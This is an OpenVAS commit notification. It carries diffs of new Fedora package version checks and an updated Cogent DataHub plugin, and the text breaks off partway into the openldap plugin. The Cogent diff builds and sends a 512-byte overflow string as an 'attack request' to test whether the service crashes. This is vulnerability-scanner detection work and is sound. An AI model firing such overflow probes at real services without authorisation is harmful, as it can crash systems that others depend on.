[Openvas-commits] r11702 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Tue Sep 27 17:30:02 CEST 2011


Author: veerendragg
Date: 2011-09-27 17:29:53 +0200 (Tue, 27 Sep 2011)
New Revision: 11702

Added:
   trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
   trunk/openvas-plugins/scripts/gb_fedora_2011_9820_libsoup_fc14.nasl
   trunk/openvas-plugins/scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
   trunk/openvas-plugins/scripts/gb_merak_mail_server_detect.nasl
   trunk/openvas-plugins/scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl
Log:
Added new plugins. Updated to detect latest version. Added application confirmation and Updated code completely as exploit was not working properly. Added new LSC plugins.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/ChangeLog	2011-09-27 15:29:53 UTC (rev 11702)
@@ -1,3 +1,31 @@
+2011-09-27  Veerendra G.G <veerendragg at secpod.com>
+
+	* scripts/secpod_bloggeruniverse_sql_injection_vuln.nasl,
+	scripts/secpod_tooltalk_rpc_database_server_mult_vuln.nasl,
+	scripts/secpod_icewarp_mail_server_xml_inj_n_info_disc_vuln.nasl:
+	Added new plugins.
+
+	* scripts/gb_merak_mail_server_detect.nasl:
+	Updated to detect latest version.
+
+	* scripts/gb_cogent_datahub_unicode_bof_vuln.nasl,
+	scripts/secpod_metaserver_rt_multiple_dos_vuln.nasl:
+	Added application confirmation and Updated code completely as exploit
+	was not working properly.
+
+	* scripts/gb_fedora_2011_9820_libsoup_fc14.nasl,
+	scripts/gb_fedora_2011_12698_cherokee_fc15.nasl,
+	scripts/gb_fedora_2011_3627_openldap_fc14.nasl,
+	scripts/gb_fedora_2011_12687_cherokee_fc14.nasl,
+	scripts/gb_fedora_2011_12145_qt_fc14.nasl,
+	scripts/gb_fedora_2011_11196_foomatic_fc15.nasl,
+	scripts/gb_fedora_2011_12614_quassel_fc15.nasl,
+	scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl,
+	scripts/gb_fedora_2011_12580_quassel_fc14.nasl,
+	scripts/gb_fedora_2011_12300_nss_fc14.nasl,
+	scripts/gb_fedora_2011_11205_foomatic_fc14.nasl:
+	Added new LSC plugins.
+
 2011-09-27  Henri Doreau <henri.doreau at greenbone.net>
 
 	* scripts/secpod_ms_win_media_player_detect_900173.nasl: Don't
@@ -44,7 +72,7 @@
 	* scripts/gb_openssl_detect_lin.nasl: Updated regexp to produce a
 	valid CPE (avoid suffix letter duplication).
 
-2011-09-22  Veerendra G.G <veerendragg at secpod.com>,
+2011-09-22  Veerendra G.G <veerendragg at secpod.com>
 
 	* scripts/secpod_colasoft_capsa_snmp_dos_vuln.nasl,
 	scripts/secpod_google_chrome_mult_vuln_sep11_lin.nasl,

Modified: trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_cogent_datahub_unicode_bof_vuln.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -86,6 +86,16 @@
   exit(0);
 }
 
+## Send normal request
+req = string('(domain "openvas-test")', raw_string(0x0a));
+send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
+
+## Confirm Application
+if('success "domain" "openvas-test"' >!< res){
+  exit(0);
+}
+
 ## Construct Attack Request
 attack =  crap(data: "a", length:512);
 req = string('(domain "', attack, '")', raw_string(0x0a),
@@ -96,7 +106,7 @@
 
 ## Sending Attack
 send(socket:soc, data:req);
-send(socket:soc, data:req);
+res = recv(socket:soc, length:1024);
 close(soc);
 
 sleep(5);

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11196_foomatic_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11196
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863536);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-11196");
+  script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+  script_name("Fedora Update for foomatic FEDORA-2011-11196");
+  desc = "
+
+  Vulnerability Insight:
+  Foomatic is a comprehensive, spooler-independent database of printers,
+  printer drivers, and driver descriptions. This package contains
+  utilities to generate driver description files and printer queues for
+  CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+  There is also the possibility to read the PJL options out of PJL-capable
+  laser printers and take them into account at the driver description
+  file generation.
+  
+  There are spooler-independent command line interfaces to manipulate
+  queues (foomatic-configure) and to print files/manipulate jobs
+  (foomatic printjob).
+  The site http://www.linuxprinting.org/
+
+
+  Affected Software/OS:
+  foomatic on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066208.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of foomatic");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_11205_foomatic_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for foomatic FEDORA-2011-11205
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863540);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"6.8");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-11205");
+  script_cve_id("CVE-2011-2924", "CVE-2011-2697", "CVE-2011-2923");
+  script_name("Fedora Update for foomatic FEDORA-2011-11205");
+  desc = "
+
+  Vulnerability Insight:
+  Foomatic is a comprehensive, spooler-independent database of printers,
+  printer drivers, and driver descriptions. This package contains
+  utilities to generate driver description files and printer queues for
+  CUPS, LPD, LPRng, and PDQ using the database (packaged separately).
+  There is also the possibility to read the PJL options out of PJL-capable
+  laser printers and take them into account at the driver description
+  file generation.
+
+  There are spooler-independent command line interfaces to manipulate
+  queues (foomatic-configure) and to print files/manipulate jobs
+  (foomatic printjob).
+
+  The site http://www.linuxprinting.org/
+
+
+  Affected Software/OS:
+  foomatic on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066225.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of foomatic");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"foomatic", rpm:"foomatic~4.0.8~3.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12145_qt_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for qt FEDORA-2011-12145
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863543);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_xref(name: "FEDORA", value: "2011-12145");
+  script_cve_id("CVE-2010-1822", "CVE-2011-3194");
+  script_name("Fedora Update for qt FEDORA-2011-12145");
+  desc = "
+
+  Vulnerability Insight:
+  Qt is a software toolkit for developing applications.
+  
+  This package contains base tools, like string, xml, and network
+  handling.
+  
+  Affected Software/OS:
+  qt on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066209.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of qt");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"qt", rpm:"qt~4.7.4~2.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12300_nss_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for nss FEDORA-2011-12300
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863544);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12300");
+  script_name("Fedora Update for nss FEDORA-2011-12300");
+  desc = "
+
+  Vulnerability Insight:
+  Network Security Services (NSS) is a set of libraries designed to
+  support cross-platform development of security-enabled client and
+  server applications. Applications built with NSS can support SSL v2
+  and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509
+  v3 certificates, and other security standards.
+
+
+  Affected Software/OS:
+  nss on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066221.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of nss");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"nss", rpm:"nss~3.12.10~4.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12580_quassel_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12580
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863539);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12580");
+  script_cve_id("CVE-2011-3354");
+  script_name("Fedora Update for quassel FEDORA-2011-12580");
+  desc = "
+
+  Vulnerability Insight:
+  Quassel IRC is a modern, distributed IRC client,
+  meaning that one (or multiple) client(s) can attach
+  to and detach from a central core --
+  much like the popular combination of screen and a
+  text-based IRC client such as WeeChat, but graphical
+
+
+  Affected Software/OS:
+  quassel on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066250.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of quassel");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12614_quassel_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for quassel FEDORA-2011-12614
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863545);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12614");
+  script_cve_id("CVE-2011-3354");
+  script_name("Fedora Update for quassel FEDORA-2011-12614");
+  desc = "
+
+  Vulnerability Insight:
+  Quassel IRC is a modern, distributed IRC client,
+  meaning that one (or multiple) client(s) can attach
+  to and detach from a central core --
+  much like the popular combination of screen and a
+  text-based IRC client such as WeeChat, but graphical
+
+
+  Affected Software/OS:
+  quassel on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066265.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of quassel");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"quassel", rpm:"quassel~0.7.3~1.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12616_rsyslog_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for rsyslog FEDORA-2011-12616
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863537);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"cvss_base", value:"5.0");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_xref(name: "FEDORA", value: "2011-12616");
+  script_cve_id("CVE-2011-3200");
+  script_name("Fedora Update for rsyslog FEDORA-2011-12616");
+  desc = "
+
+  Vulnerability Insight:
+  Rsyslog is an enhanced, multi-threaded syslog daemon. It supports MySQL,
+  syslog/TCP, RFC 3195, permitted sender lists, filtering on any message part,
+  and fine grain output format control. It is compatible with stock sysklogd
+  and can be used as a drop-in replacement. Rsyslog is simple to set up, with
+  advanced features suitable for enterprise-class, encryption-protected syslog
+  relay chains.
+
+
+  Affected Software/OS:
+  rsyslog on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066271.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of rsyslog");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"rsyslog", rpm:"rsyslog~5.8.5~1.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12687_cherokee_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12687
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863541);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12687");
+  script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+  script_name("Fedora Update for cherokee FEDORA-2011-12687");
+  desc = "
+
+  Vulnerability Insight:
+  Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+  the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+  encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+  Apache compatible log files, and much more.
+
+
+  Affected Software/OS:
+  cherokee on Fedora 14
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066257.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of cherokee");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC14")
+{
+
+  if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc14", rls:"FC14"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_12698_cherokee_fc15.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for cherokee FEDORA-2011-12698
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(863538);
+  script_version("$Revision$: 1.0");
+  script_tag(name:"risk_factor", value:"High");
+  script_xref(name: "FEDORA", value: "2011-12698");
+  script_cve_id("CVE-2011-2190", "CVE-2011-2191");
+  script_name("Fedora Update for cherokee FEDORA-2011-12698");
+  desc = "
+
+  Vulnerability Insight:
+  Cherokee is a very fast, flexible and easy to configure Web Server. It supports
+  the widespread technologies nowadays: FastCGI, SCGI, PHP, CGI, TLS and SSL
+  encrypted connections, Virtual hosts, Authentication, on the fly encoding,
+  Apache compatible log files, and much more.
+
+
+  Affected Software/OS:
+  cherokee on Fedora 15
+
+  Fix: Please Install the Updated Packages.
+
+  References:
+  http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066222.html
+
+  ";
+
+  script_description(desc);
+  script_summary("Check for the Version of cherokee");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Fedora Local Security Checks");
+  script_dependencies("gather-package-list.nasl");
+  script_require_keys("ssh/login/release");
+  exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+if(release == NULL){
+  exit(0);
+}
+
+if(release == "FC15")
+{
+
+  if(isrpmvuln(pkg:"cherokee", rpm:"cherokee~1.2.99~1.fc15", rls:"FC15"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+
+  exit(0);
+}
\ No newline at end of file

Added: trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl	2011-09-27 13:50:49 UTC (rev 11701)
+++ trunk/openvas-plugins/scripts/gb_fedora_2011_3627_openldap_fc14.nasl	2011-09-27 15:29:53 UTC (rev 11702)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for openldap FEDORA-2011-3627
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
